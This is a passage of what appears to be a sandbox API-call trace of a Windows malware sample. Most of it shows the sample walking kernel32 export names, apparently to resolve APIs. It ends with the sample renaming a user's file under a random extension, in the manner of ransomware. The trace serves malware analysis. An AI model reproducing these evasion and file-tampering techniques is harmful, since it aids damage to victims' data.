(lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.275] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.275] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.275] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.275] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.275] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.275] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.275] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.275] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.275] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.276] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.276] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.276] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.276] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.276] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.276] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.276] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.276] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.276] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.276] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.276] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.276] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.276] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.276] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.276] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.276] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.276] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.276] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.276] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.277] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.277] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.277] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.277] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.277] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.277] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.277] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.277] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.277] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.277] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.277] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.277] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.277] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.277] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.277] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.277] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.277] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.277] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.277] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.277] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.278] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.278] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.278] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.278] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.278] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.278] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.278] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.278] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.278] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.278] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.278] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.278] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.278] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.278] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.278] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.278] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.278] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.278] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.278] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.278] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.279] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.279] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.279] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.279] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.279] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.279] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.279] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.279] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.279] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.279] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.279] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.279] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.279] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.279] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.279] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.279] lstrlenA (lpString="DELETEATOM") returned 10 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.279] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.279] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.279] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.279] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.280] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.280] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.280] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.280] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.280] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.280] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.280] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.280] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.280] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.280] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.280] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.280] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.280] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.280] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.280] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.280] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.280] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.280] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.280] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.281] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.281] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.281] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.281] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.281] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.281] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.281] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.281] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.281] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.281] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.281] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.281] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.281] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.281] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.281] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.281] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.281] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.281] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.281] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.281] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.282] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.282] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.282] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms") returned 128 [0080.282] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.ptaR9rA") returned 136 [0080.282] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\be71009ff8bb02a2.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\be71009ff8bb02a2.customDestinations-ms.ptaR9rA" (normalized: 